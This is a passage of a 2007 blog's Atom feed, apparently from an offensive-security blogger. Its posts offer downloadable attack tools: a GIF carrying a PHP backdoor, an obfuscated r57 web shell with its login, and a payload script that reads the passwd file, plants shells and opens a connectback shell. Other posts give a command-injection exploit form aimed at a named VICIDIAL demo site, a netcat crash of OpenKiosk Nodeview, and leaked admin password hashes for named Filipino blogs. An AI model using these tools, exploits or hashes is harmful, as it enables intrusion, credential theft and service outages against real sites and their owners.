type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/2765409771713743201'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/2765409771713743201'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/07/mpack-090.html' title='Mpack 0.90'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-7860193429716055060</id><published>2007-07-08T17:23:00.000+08:00</published><updated>2008-12-10T10:41:46.941+08:00</updated><title type='text'>Intellicare SMS service vulnerability</title><content type='html'>&lt;a href="http://www.intellicare.com.ph/"&gt;Intellicare&lt;/a&gt; is a health maintenance organization (HMO) engaged in the delivery of managed healthcare services. As part of their service to customers they have installed a web based sms portal. This sms service can be remotely compromised and medical information about clients disclosed. It can also be used to send and receive "unauthorized" sms as well.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_z88lTJOxKPA/RpCwXtbm_xI/AAAAAAAAAAU/4NNG3x2B7AY/s320/intellitxt.bmp"&gt;&lt;img id="BLOGGER_PHOTO_ID_5084757900680167186" style="DISPLAY: block; MARGIN: 0px auto 10px; CURSOR: hand; TEXT-ALIGN: center" alt="" src="http://3.bp.blogspot.com/_z88lTJOxKPA/RpCwXtbm_xI/AAAAAAAAAAU/4NNG3x2B7AY/s320/intellitxt.bmp" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="https://www.intellicare.com.ph/intellitxt/login.asp"&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-7860193429716055060?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/7860193429716055060/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=7860193429716055060' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7860193429716055060'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7860193429716055060'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/07/intellicare-sms-service-vulnerability.html' title='Intellicare SMS service vulnerability'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_z88lTJOxKPA/RpCwXtbm_xI/AAAAAAAAAAU/4NNG3x2B7AY/s72-c/intellitxt.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-815225262653670685</id><published>2007-07-01T17:14:00.000+08:00</published><updated>2007-07-08T17:18:38.321+08:00</updated><title type='text'>The Athens Affair</title><content type='html'>&lt;a href="http://www.spectrum.ieee.org/print/5280"&gt;http://www.spectrum.ieee.org/print/5280&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A very nice article about the cellphone wiretapping case in greece. Personally I think it's the NSA, CIA :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-815225262653670685?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/815225262653670685/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=815225262653670685' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/815225262653670685'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/815225262653670685'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/07/httpwww.html' title='The Athens Affair'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-2856702043799722344</id><published>2007-05-28T11:03:00.000+08:00</published><updated>2007-07-08T17:21:07.343+08:00</updated><title type='text'>Tech Blogs MD5 hashes</title><content type='html'>Some Filipino tech oriented blogs and the corresponding md5 hashes of the admin password.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.yugatech.com/"&gt;http://www.yugatech.com/&lt;/a&gt; - 30ae4352335c35041112831001a003b0&lt;br /&gt;&lt;br /&gt;&lt;a href="http://racoma.com.ph/"&gt;racoma.com.ph&lt;/a&gt; - 89098df6a236127d6f446d9d2e910e3c&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.pinoytechblog.com/"&gt;http://www.pinoytechblog.com/&lt;/a&gt; - 2a5de4f53b1317f7e36afcdb6b5202a4&lt;br /&gt;&lt;br /&gt;&lt;a href="http://paraz.com/"&gt;paraz.com&lt;/a&gt; - fcbc1aa786f6861d1239e144564d8d42&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.pinoygeek.org/"&gt;pinoygeek.org&lt;/a&gt; - 2bd96487449f461306e6de359bd7e109&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Not a tech blog...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.philippineblogawards.com.ph/"&gt;http://www.philippineblogawards.com.ph/&lt;/a&gt; - f160178aac7f797e0aafa8f86bd61c5a&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-2856702043799722344?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/2856702043799722344/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=2856702043799722344' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/2856702043799722344'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/2856702043799722344'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/05/tech-blogs-md5-hashes.html' title='Tech Blogs MD5 hashes'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-4256456081140425538</id><published>2007-05-26T21:29:00.000+08:00</published><updated>2007-05-28T11:22:36.570+08:00</updated><title type='text'>Some PHP Tools</title><content type='html'>&lt;center&gt;&lt;img src="http://sujiru.googlepages.com/kidlat.gif" /&gt;&lt;/center&gt;&lt;p&gt;&lt;br /&gt;&lt;a href="http://sujiru.googlepages.com/kidlat.gif"&gt;sujiru.googlepages.com/kidlat.gif&lt;/a&gt; - a working gif with php backdoor embedded. Useful for sites with a local file inclusion vulnerability and accepts only picture uploads.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sujiru.googlepages.com/sujiru.php"&gt;Sujiru.php&lt;/a&gt; - r57 php shell ver 1.31. The original release was backdoored. They were removed from this file. The code was also obfuscated to frustrate casual examination by anyone finding and reading the file. User:sujiru Pass:akoaymaylobo. You can change the values declared in the file. Also available in &lt;a href="http://sujiru.googlepages.com/sujiru.txt"&gt;.txt &lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="http://sujiru.googlepages.com/payload.php"&gt;Payload.php&lt;/a&gt; - Used primarily for RFI. Gives info about the host, reads the passwd file, looks for interesting files in the webroot. Automatically writes the above php shell in two locations, the first and last writeable directories it finds relative to the vulnerable script. Tries to establish a connectback shell to a host you specify. You can specify the host by using file.php?ip= or by editing the $ip variable. Also mails information. Note:Didn't have the time to clean the code, but everything works. Also available in &lt;a href="http://sujiru.googlepages.com/payload.txt"&gt;.txt&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-4256456081140425538?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/4256456081140425538/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=4256456081140425538' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4256456081140425538'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4256456081140425538'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/05/some-php-tools.html' title='Some PHP Tools'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-1240401260524082408</id><published>2007-05-23T22:28:00.000+08:00</published><updated>2007-05-23T22:40:17.222+08:00</updated><title type='text'>Cisco FTP Vulnerability</title><content type='html'>&lt;strong&gt;Timeline:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;May 9, 2007 -  Cisco announce &lt;a href="http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml"&gt;vulnerability&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;May 11, 2007 - Cisco says FTP vulnerability &lt;a href="http://www.computerworld.com/action/article.do?command=viewArticleBasic&amp;articleId=9019219"&gt;may provide hacker backdoor &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;May 15, 2007 - Some dispute the &lt;a href="http://www.eweek.com/article2/0,1759,2130100,00.asp?kc=EWRSS03129TX1K0000614"&gt;"backdoor" scenario&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;May 16, 2007 - Report about &lt;a href="http://www.networkworld.com/news/2007/051607-cisco-routers-major-outage-japan.html"&gt;major cisco outage &lt;/a&gt; in Japan.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-1240401260524082408?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/1240401260524082408/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=1240401260524082408' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1240401260524082408'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1240401260524082408'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/05/cisco-ftp-vulnerability.html' title='Cisco FTP Vulnerability'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-4573073797861104675</id><published>2007-05-20T02:34:00.000+08:00</published><updated>2007-05-20T03:35:13.018+08:00</updated><title type='text'>VICIDIAL Vulnerability</title><content type='html'>VICIDIAL is a set of programs that are designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound call center suite. The agent interface is an interactive set of web pages that work through a web browser to give real-time information and functionality with nothing more than an internet browser on the client computer.&lt;br /&gt;&lt;br /&gt;More information could be found at &lt;a href="http://astguiclient.sourceforge.net/vicidial.html"&gt;http://astguiclient.sourceforge.net/vicidial.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Exploiting..&lt;br /&gt;&lt;br /&gt;On the &lt;a href="http://www.eflo.net/"&gt;demo&lt;/a&gt; site, which we assume is a default install, the file project_auth_entries.txt does not seem to be protected from direct access thus giving out valid usernames and passwords. More info can be gotten from the file admin_changes_log.txt.&lt;br /&gt;&lt;br /&gt;Once we have a valid username and password we can execute shell commands by exploiting the AST_admin_log_display.php script. An exploit would be something like&lt;br /&gt;&lt;br /&gt;&amp;ltform action="http://www.eflo.net/vicidial/AST_admin_log_display.php" method="get"&amp;gt&lt;br /&gt;&amp;ltinput maxlength="500" size="50" value="1;$replace_this_with_your_cmd;" name="query_date"&amp;gt&lt;br /&gt;&amp;ltinput type="submit" value="SUBMIT" name="SUBMIT"&amp;gt&lt;br /&gt;&amp;lt/form&amp;gt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Change the host and directory if needed and save as an .htm file. Spaces would appear to be filtered&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-4573073797861104675?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4573073797861104675'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4573073797861104675'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/05/vicidial-vulnerability.html' title='VICIDIAL Vulnerability'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-7844344267829642530</id><published>2007-05-14T14:02:00.000+08:00</published><updated>2008-12-10T10:41:47.175+08:00</updated><title type='text'>OpenKiosk Nodeview DoS</title><content type='html'>&lt;a href="http://openkiosk.sourceforge.net/"&gt;OpenKiosk&lt;/a&gt;, a &lt;a href="http://linux.org.ph/forge/"&gt;Filipino made &lt;/a&gt;open source kiosk software, includes &lt;a href="http://prdownloads.sourceforge.net/openkiosk/nodeview-2.0.3b-install.exe?download"&gt;Nodeview&lt;/a&gt; as the server component. Nodeview is vulnerabe to a Denial of Service attack. By connecting to port 10012 of the machine running Nodeview using netcat or telnet and entering any character, a space, another character and pressing enter, an error is triggered in the qtcore4.dll. Port 10012 is used by a mini webserver accepting xmlrpc POST requests.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sujiru.googlepages.com/nodeview.JPG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5064303291936182434" style="DISPLAY: block; MARGIN: 0px auto 10px; CURSOR: hand; TEXT-ALIGN: center" height="214" alt="" src="http://4.bp.blogspot.com/_z88lTJOxKPA/RkgFAx6ykKI/AAAAAAAAAAM/7x0R5gSc_wQ/s320/nodeview.JPG" width="316" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-7844344267829642530?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/7844344267829642530/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=7844344267829642530' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7844344267829642530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7844344267829642530'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/05/test-post.html' title='OpenKiosk Nodeview DoS'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_z88lTJOxKPA/RkgFAx6ykKI/AAAAAAAAAAM/7x0R5gSc_wQ/s72-c/nodeview.JPG' height='72' width='72'/><thr:total>0</thr:total></entry></feed>
